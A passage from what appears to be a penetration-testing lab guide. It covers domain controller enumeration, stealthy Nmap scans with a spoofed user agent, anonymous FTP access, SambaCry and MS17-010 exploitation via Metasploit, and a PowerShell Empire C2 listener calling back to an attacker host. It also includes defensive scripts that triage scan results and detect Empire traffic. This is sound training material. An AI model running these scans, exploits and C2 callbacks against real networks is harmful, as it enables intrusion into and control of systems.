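# captured text (e.g. "search corp.local" / "nameserver 10.10.93.10");
# only enumerate_domain_controllers touches the network.

# Emit "nameserver=<ip>" for every resolver and "domain=<name>" for the first
# domain/search entry, which is what DHCP normally pushes on a corporate LAN.
parse_resolv_conf() {
    awk '
        ($1 == "domain" || $1 == "search") && !d { d = $2 }
        $1 == "nameserver"                       { print "nameserver=" $2 }
        END                                      { if (d) print "domain=" d }
    '
}

# Reduce `nslookup -q=SRV` output to bare DC hostnames. Linux (bind9) nslookup
# prints "service = <prio> <weight> <port> <target>."; Windows nslookup prints
# "svr hostname = <target>". Both put the target last on the line.
parse_srv_answer() {
    awk '
        /service = / || /svr hostname/ { h = $NF; sub(/\.$/, "", h); print h }
    '
}

# Live helper: read the real resolv.conf and ask the DHCP-supplied resolver
# directly, so a split-tunnel VPN cannot route the query to the wrong server.
enumerate_domain_controllers() {
    local conf=${1:-/etc/resolv.conf} domain ns
    domain=$(parse_resolv_conf <"$conf" | sed -n 's/^domain=//p')
    ns=$(parse_resolv_conf <"$conf" | sed -n 's/^nameserver=//p' | head -n 1)
    if [ -z "$domain" ] || [ -z "$ns" ]; then
        echo "no domain/nameserver in $conf; is the VPN (tun0) up?" >&2
        return 1
    fi
    echo "domain: $domain   resolver: $ns" >&2
    nslookup -q=SRV "_ldap._tcp.$domain" "$ns" | parse_srv_answer | sort -u
}

# Run live only when asked, so the file can also be sourced for its functions.
case "${1:-}" in
    --live) enumerate_domain_controllers "${2:-/etc/resolv.conf}" ;;
esac
```

Run it as `bash dcs.sh --live` once the VPN is up; the resolver is passed to nslookup explicitly because a host with both a corporate and a home resolver configured will otherwise answer from whichever one systemd or NetworkManager picked.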
Scanning
Now that we've identified a few systems in the environment we can make some good guesses about where we are likely to find more systems. We'll start by using Nmap to scan the subnet identified from the domain controllers and DNS server.
When using Nmap, there are many things we can do to keep our scans relatively stealthy. Let's walk through some sample commands to check out a few of the options.
Web Port Scan
nmap -sS -p 80,443,8080 --open --script http-title --script-args 'http.useragent="Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko"' 10.10.40.0/24
-sS This specifies a SYN scan, where Nmap sends a SYN packet and listens for a SYN-ACK in response. If it gets one, Nmap sends a RST to tear the connection down without completing the TCP handshake. If you're running as root in Kali, this is the default scan type. It needs raw socket privileges, so as a non-root user (or on other operating systems) Nmap falls back to a full connect scan (-sT), which completes the handshake and is easier to log.
-p 80,443,8080 This specifies the ports that we are going to scan. 80 and 443 are the default HTTP
and HTTPS ports respectively, while 8080 is a common port for other HTTP applications and admin
interfaces. Scanning a limited amount of ports at a time helps us evade some generic port scanning
detection rules.
--open This specifies that we only want open ports to be returned in the results.
--script http-title Here we specify a script to run on open ports that will output the title of
webpages. These scripts can be found in /usr/share/nmap/scripts/ if you want to check them out.
--script-args 'http.useragent="Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0)
like Gecko"' This specifies a user agent string to use with the script. Nmapâs default user agent string
says that it is Nmap, so that is an easy way to get caught. Here we pretend to be Internet Explorer.
10.10.40.0/24 Lastly, this is the range we are going to scan! Keeping this to one subnet at a time will
increase the chances of your scans staying under the radar.
Database Port Scan
nmap -sS -p 1433,3306 --open --script ms-sql-info,ms-sql-empty-password,mysql-info,mysql-empty-password 10.10.40.0/24
The script list must be comma-separated with no spaces; a space would make the shell pass the remaining names as separate arguments, which Nmap would then try to resolve as targets.
-p 1433,3306 This specifies the ports that we are going to scan. 1433 is the default port for an MSSQL
database, and 3306 is the default port for a MySQL database. Scanning a limited amount of ports at a
time helps us evade some generic port scanning detection rules.
--script ms-sql-info,ms-sql-empty-password,mysql-info,mysql-empty-password These
scripts will retrieve information about databases on open ports, and check for empty passwords.
FTP, SSH and Telnet Port Scan
nmap -sS -p 21,22,23 --open --script ftp-anon,banner 10.10.40.0/24
-p 21,22,23 This specifies the ports that we are going to scan. 21 is the standard FTP port, 22 is the
standard SSH port, and 23 is the standard Telnet port. Scanning a limited amount of ports at a time
helps us evade some generic port scanning detection rules.
--script ftp-anon,banner The ftp-anon script checks for anonymous access to FTP services. The banner script will output the banner for any open services, which helps to identify potentially exploitable services and their versions.
Nmap has many more options and scripts, but these should provide a solid starting point for you in the lab.
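Here is an added example (our own, not from the manual) that scripts the three staged scans above against a single subnet and converts Nmap's grepable (-oG) output into a host/port/service table you can paste into your notes. The -n and --max-rate flags, the output directory, and the IIS host used to exercise the parser are assumptions; the port groups, scripts and user agent are the manual's own.

```bash
#!/usr/bin/env bash
# Added example, not part of the lab manual: run the three low-noise port
# groups from this section against one subnet, write grepable output, and turn
# it into a host/port/service table. Targets, output paths and the extra
# rate/DNS flags are assumptions. parse_grepable reads stdin and can be tried
# on a captured .gnmap line without scanning anything.

# Grepable (-oG) host lines look like:
#   Host: 10.10.40.12 (web01)<TAB>Ports: 80/open/tcp//http//IIS 8.5/, ...<TAB>Ignored State: ...
# Each port entry is port/state/proto/owner/service/rpcinfo/version/.
parse_grepable() {
    awk -F '\t' '
        /^Host: / {
            ports = ""
            for (i = 2; i <= NF; i++) if ($i ~ /^Ports: /) ports = substr($i, 8)
            if (ports == "") next            # "Status: Up" lines carry no ports
            split($1, host, " ")              # host[2] is the IP address
            n = split(ports, entry, ", ")
            for (i = 1; i <= n; i++) {
                split(entry[i], f, "/")
                # Keep open ports only (the same filter --open applies).
                if (f[2] == "open")
                    print host[2] "\t" f[1] "/" f[3] "\t" f[5] "\t" f[7]
            }
        }
    '
}

# Live helper: one /24 at a time, one small port group per run.
staged_scan() {
    local subnet=$1 outdir=${2:-scans}
    local ua='Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko'
    mkdir -p "$outdir"
    # -n skips reverse DNS of every address (fewer PTR queries landing in the
    # DC's logs); --max-rate is an assumed pacing value, tune it to the network.
    sudo nmap -sS -n --max-rate 50 -p 80,443,8080 --open \
        --script http-title --script-args "http.useragent=\"$ua\"" \
        -oG "$outdir/web.gnmap" "$subnet"
    sudo nmap -sS -n --max-rate 50 -p 1433,3306 --open \
        --script ms-sql-info,ms-sql-empty-password,mysql-info,mysql-empty-password \
        -oG "$outdir/db.gnmap" "$subnet"
    sudo nmap -sS -n --max-rate 50 -p 21,22,23 --open \
        --script ftp-anon,banner \
        -oG "$outdir/ftp-ssh-telnet.gnmap" "$subnet"
    cat "$outdir"/*.gnmap | parse_grepable | sort -u
}

case "${1:-}" in
    --live) staged_scan "${2:?subnet required, e.g. 10.10.40.0/24}" "${3:-scans}" ;;
esac
```

`bash staged-scan.sh --live 10.10.40.0/24` leaves the raw .gnmap files behind for the NSE script output (titles, banners, empty-password findings), which the table deliberately omits; grep those files for "anonymous" or "http-title" when you move on to the entry points below.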
Manual Information Gathering
Often, there are webpages in an environment that disclose useful internal information. This information
includes hostnames, IP addresses, usernames, emails, and other data that helps an attacker improve
their understanding of the internal environment. Host names and IPs are often in the form of links to
other internal websites and can help an attacker identify subnets where servers are located. Usernames
and emails are often listed as contact information, and help an attacker find users they may want to
target.
Pages that might have significant amounts of this information include things like internal home pages, wiki pages, or other custom "intranet" sites. Keep an eye out for these in scan results or try manually guessing some common DNS aliases such as "wiki", "intranet", "home", or "portal".
Unauthenticated Entry Points
Easily Guessable FTP
What is it?
FTP is a common service on internal networks used for transferring and hosting files. Depending on the
use case, FTP servers can contain some sensitive data (think usernames and passwords, PII, PCI data,
etc.). This makes them attractive targets for attackers. Especially since they are sometimes configured to
allow anonymous access, or with easily guessable credentials!
How do we identify it?
FTP servers with anonymous or default access allowed can be easily identified during our initial reconnaissance with an Nmap scan and NSE script. Scan for TCP port 21 with the "ftp-anon" NSE script to identify FTP servers that accept anonymous logins. Another script, "ftp-brute", will perform brute force authentication against the server; be aware that a stream of failed logins is noisy and may lock accounts or trigger alerts.
How do we check if it's vulnerable?
You'll be able to identify if the server is indeed vulnerable from the NSE script output, which will list any successfully identified valid credentials (for ftp-anon, the directory listing returned to the anonymous user).
How do we exploit the vulnerability?
To exploit a server with this misconfiguration, simply authenticate with your favorite command line utility or GUI using the "anonymous" user and no password (some servers expect an email address as the password), or the credentials identified by the brute forcing script. Then, browse the available items searching for sensitive data.
ftp <username>@<target-ip>
SambaCry
What is it?
SambaCry (CVE-2017-7494) affects Samba, the open-source SMB implementation used on Linux and other Unix-like systems, and results in remote code execution. The vulnerability allows a client with write access to a share (anonymous or guest access is enough) to upload a shared library to that share and then cause the server to load and execute it, by opening a named pipe whose name is the path to the uploaded file.
How do we identify it?
The first step in identifying SambaCry is to find SMB ports open on Linux servers. This can be accomplished with Nmap by scanning for port 445 and performing operating system detection with the -O flag (the smb-os-discovery NSE script is another way to tell a Samba server apart from a Windows file server).
How do we check if it's vulnerable?
There are a couple of conditions that must all hold for an identified Linux system running Samba to be exploitable. First, there must be a writable share at a known location. The server must also not have had the workaround for this vulnerability applied: if "nt pipe support = no" is configured then the service will not be vulnerable. Finally, you must be able to make the server load the uploaded file by opening a named pipe whose name is the file's path on the server.
You can check for all of these conditions with a helpful Nmap NSE script, smb-vuln-cve-2017-7494.
How do we exploit the vulnerability?
After positively identifying a vulnerable system, we can use Metasploit to exploit it and gain an
interactive shell.
use exploit/linux/samba/is_known_pipename
Be sure to set the required options (the target host, and the share name if the module cannot locate a
writable share on its own), then run the module!
Missing Windows Patches
What is it?
Microsoft regularly issues security patches to fix identified vulnerabilities in the Windows operating
system. Occasionally, these vulnerabilities are severe enough to allow unauthenticated remote code
execution. A few classic examples are commonly used during penetration testing to gain remote code
execution and an initial foothold:
MS08-067: Vulnerability in Server service could allow remote code execution.
MS10-061: Vulnerability in Print Spooler Service could allow remote code execution.
MS17-010: Vulnerability in the SMBv1 protocol (EternalBlue) could allow remote code execution.
Because large organizations have complex patch-management procedures, critical patches for these
types of security issues sometimes go unapplied. This makes unpatched Windows systems especially juicy
targets for attackers.
How do we identify it?
Most of the critical Windows vulnerabilities that result in remote code execution have reliable methods
of identification. In general, port scanning with OS and service version detection gives a first clue as
to whether a system might be vulnerable to a specific exploit.
For example, older Windows XP systems are commonly not patched for MS08-067. Identifying XP in an
environment often means you have found a trivial way to gain access to the Windows domain.
How do we check if it's vulnerable?
You can often determine whether a Windows system is missing a particular patch with scanners like Nmap
and Metasploit. Nmap ships a number of SMB vulnerability-checking NSE scripts (smb-vuln-ms08-067 and
smb-vuln-ms17-010 among them) which come in handy for identifying vulnerable servers, and Metasploit's
auxiliary/scanner/smb/smb_ms17_010 module checks for MS17-010 without attempting exploitation.
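The NSE scripts named in the FTP, SambaCry and Windows sections above all write their results into Nmap's XML report (-oX), so one small parser can turn a scan of the whole lab into a prioritized target list. The following is an added example, not code from the original lab guide: it expects a report produced by something like `nmap -oX report.xml -p 21,139,445 --script ftp-anon,ftp-brute,smb-vuln-cve-2017-7494,smb-vuln-ms08-067,smb-vuln-ms17-010 <targets>`. The embedded report is constructed for the example, with the script output shortened; the 'State:' and 'Valid credentials' strings it matches on come from Nmap's vulns and brute libraries.

```python
"""Triage Nmap XML output for anonymous FTP, weak FTP credentials and smb-vuln-* findings.

Added example; not from the original lab guide. SAMPLE_REPORT is constructed.
"""
import re
import xml.etree.ElementTree as ET

# Nmap's vulns library prints "State: VULNERABLE" or "State: LIKELY VULNERABLE" for
# positive results; with vulns.showall set it also prints "State: NOT VULNERABLE",
# which this pattern deliberately does not match.
VULN_STATE = re.compile(r"State:\s*(LIKELY )?VULNERABLE")
# Nmap's brute library reports accounts as "user:pass - Valid credentials".
VALID_CREDS = re.compile(r"^\s*(\S+?):(\S*) - Valid credentials", re.MULTILINE)

# Constructed report: one FTP host, one Samba host, one Windows host (ms08-067 shown as
# NOT VULNERABLE to exercise the negative case).
SAMPLE_REPORT = """<nmaprun scanner="nmap" args="constructed sample" version="7.80">
<host><status state="up"/><address addr="10.10.10.20" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="21"><state state="open"/><service name="ftp"/>
<script id="ftp-anon" output="Anonymous FTP login allowed (FTP code 230)&#xa;-rw-r--r--   1 0  0  2048 Jun 14 10:22 backup.sql"/>
<script id="ftp-brute" output="&#xa;  Accounts: &#xa;    admin:admin - Valid credentials&#xa;  Statistics: Performed 14 guesses in 3 seconds, average tps: 4.7"/>
</port></ports></host>
<host><status state="up"/><address addr="10.10.10.30" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="445"><state state="open"/><service name="netbios-ssn"/></port></ports>
<hostscript><script id="smb-vuln-cve-2017-7494" output="&#xa;  VULNERABLE:&#xa;  SAMBA Remote Code Execution from Writable Share&#xa;    State: VULNERABLE&#xa;    IDs:  CVE:CVE-2017-7494"/></hostscript></host>
<host><status state="up"/><address addr="10.10.10.40" addrtype="ipv4"/>
<ports><port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds"/></port></ports>
<hostscript>
<script id="smb-vuln-ms17-010" output="&#xa;  VULNERABLE:&#xa;  Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)&#xa;    State: VULNERABLE&#xa;    IDs:  CVE:CVE-2017-0143"/>
<script id="smb-vuln-ms08-067" output="&#xa;  NOT VULNERABLE:&#xa;  Microsoft Windows system vulnerable to remote code execution (MS08-067)&#xa;    State: NOT VULNERABLE"/>
</hostscript></host>
</nmaprun>
"""


def triage(xml_text):
    """Return a list of (host, script id, detail) tuples, one per positive finding."""
    findings = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = next(
            (a.get("addr") for a in host.findall("address") if a.get("addrtype") == "ipv4"),
            "?",
        )
        # Portrule scripts (ftp-*) sit under <port>, hostrule scripts (smb-vuln-*)
        # under <hostscript>; iterating over every <script> in the host covers both.
        for script in host.iter("script"):
            sid, out = script.get("id", ""), script.get("output", "")
            if sid == "ftp-anon" and out.startswith("Anonymous FTP login allowed"):
                findings.append((addr, sid, "anonymous login allowed"))
            elif sid == "ftp-brute":
                for user, pw in VALID_CREDS.findall(out):
                    findings.append((addr, sid, "valid credentials %s:%s" % (user, pw)))
            elif sid.startswith("smb-vuln-") and VULN_STATE.search(out):
                findings.append((addr, sid, "reported vulnerable"))
    return findings


if __name__ == "__main__":
    import sys

    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_REPORT
    for addr, sid, detail in triage(text):
        print("%-16s %-26s %s" % (addr, sid, detail))
```

Run it with no argument to see the constructed sample, or pass the path of a real -oX report. Treat the output as a worklist, not proof: the smb-vuln-* checks fingerprint the service and can be fooled by backports, so confirm with the Metasploit scanner module before exploiting.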
How do we exploit the vulnerability?
Once you identify a system as vulnerable, you'll want to exploit it. Metasploit is a great first stop to
check for modules which exploit the vulnerabilities you have identified. For instance, Metasploit has a
module to exploit MS17-010 on certain OS versions and architectures.
It's great when there are 'point and click' utilities to exploit these vulnerabilities, but often you'll
need to do a little digging to find the right exploit code or walkthroughs. For example, you'll notice that
only a couple of exploit targets are supported by the MS17-010 Metasploit module. This is where some
Google searching and a lot of persistence pays off!
Command and Control Infrastructure
Command and Control (C2) channels are an integral part of the penetration testing process. It will be
helpful to become familiar with your chosen C2 platform before starting the lab. In our examples, we'll
rely heavily on PowerShell Empire. Assuming you have already connected to the lab, we can set up some
listeners and prepare our C2 infrastructure for use in the lab.
First, you'll need to pull down Empire from its GitHub repository if you haven't already. Run
'./setup/install.sh' to install it, then './empire' to start it.
Listeners
An Empire listener is an open channel on your attacking system that 'listens' for connections from
compromised hosts. Listeners can use many different transports for moving data; we'll use the HTTP
listener in our labs. Configuring a listener is simple (Host takes a full URL; we use port 80 here):
uselistener http
set Host http://<attacker-vpn-ip>:80
execute
That's it! You should now have a listener running on your attack machine waiting for connections. We
encourage you to experiment with other listeners and techniques on your own.
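Since the point of the exercise is to validate monitoring as well as to gain access, it is worth knowing what the stock HTTP listener looks like to the blue team before you run it. The following added example (not code from the original lab guide or from the Empire project) scans constructed web-proxy log lines for requests that match Empire's default HTTP profile: three request URIs and a fixed User-Agent. The profile string is reproduced from the Empire 2.x http listener's DefaultProfile option and is an assumption to verify against the version you installed; the log format (client, method, URL, quoted user-agent) is simplified and also constructed for the example.

```python
"""Spot Empire's default HTTP listener profile in web-proxy logs.

Added example; not from the original lab guide or the Empire project.
DEFAULT_PROFILE is assumed to match Empire 2.x listeners/http.py; SAMPLE_LOG is constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Empire http listener DefaultProfile: "<uri>,<uri>,<uri>|<user-agent>" (assumed unchanged).
DEFAULT_PROFILE = (
    "/admin/get.php,/news.php,/login/process.php|"
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
)

# Constructed proxy log: one client checking in to a listener, one client browsing normally,
# and a malformed line the parser must survive.
SAMPLE_LOG = """\
10.0.0.15 GET http://203.0.113.7/news.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.0.0.15 POST http://203.0.113.7/login/process.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.0.0.15 GET http://203.0.113.7/admin/get.php "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
10.0.0.22 GET http://www.example.com/news.php "Mozilla/5.0 (X11; Linux x86_64) Firefox/52.0"
10.0.0.22 GET http://www.example.com/ "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
garbage line without quotes
""".splitlines()

# Simplified log line: client method url "user-agent"
LOG_LINE = re.compile(r'^(\S+) (\S+) (\S+) "([^"]*)"$')


def parse_profile(profile):
    """Split an Empire profile string into (set of request paths, user-agent string)."""
    uris, _, user_agent = profile.partition("|")
    return {u.strip() for u in uris.split(",") if u.strip()}, user_agent.strip()


def scan_proxy_log(lines, profile=DEFAULT_PROFILE):
    """Return {(client, server): hit count} for requests matching both the profile URIs and UA.

    A single match is weak evidence (the UA is a real Internet Explorer 11 string and the
    paths are plausible on any PHP site); repeated check-ins to the profile paths from one
    client to one server are the signal, so hits are counted per (client, server) pair.
    """
    uris, user_agent = parse_profile(profile)
    hits = defaultdict(int)
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip malformed lines instead of aborting the whole scan
        client, _method, url, ua = m.groups()
        parts = urlsplit(url)
        if ua == user_agent and parts.path in uris:
            hits[(client, parts.netloc)] += 1
    return dict(hits)


if __name__ == "__main__":
    for (client, server), count in sorted(scan_proxy_log(SAMPLE_LOG).items()):
        print("%s -> %s: %d requests matching the Empire default profile" % (client, server, count))
```

If this fires on your own check-ins during the lab, the detection side is working; if it does not, that is a finding in itself. Changing the listener's DefaultProfile is the obvious way to make the emulation harder, and re-running this scan with the new profile string shows whether the URI/UA signature was all the blue team had.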
Launchers
In Empire, a launcher is a simple one-line PowerShell or Python command that, when run on a
compromised host (for example from cmd.exe or the Run dialog), should establish an agent.
launcher <powershell or python> <listener name>
Stagers
Stagers are very similar to launchers in that they contain the initial payload to establish an agent
connection on a compromised host. However, these are generally files that must either be uploaded to
the target machine or hosted on a server for download and execution. There are numerous options to
choose from for various operating systems.
usestager <stager-option>
set <option-name> <option-value>
execute
Agents
These are the running processes on compromised hosts which reach out to our attacking machine to
check in for commands. They are established with the stagers and launchers we just configured and
provide operating system command access on the system. Simply run your launcher on a target host
(we'll go over how later) and interact with the agent to view your options.
An example of running a simple shell command, 'whoami'.
At this point, your Command and Control infrastructure should be ready to accept agent connections from
systems that you compromise in the lab. Let's get started!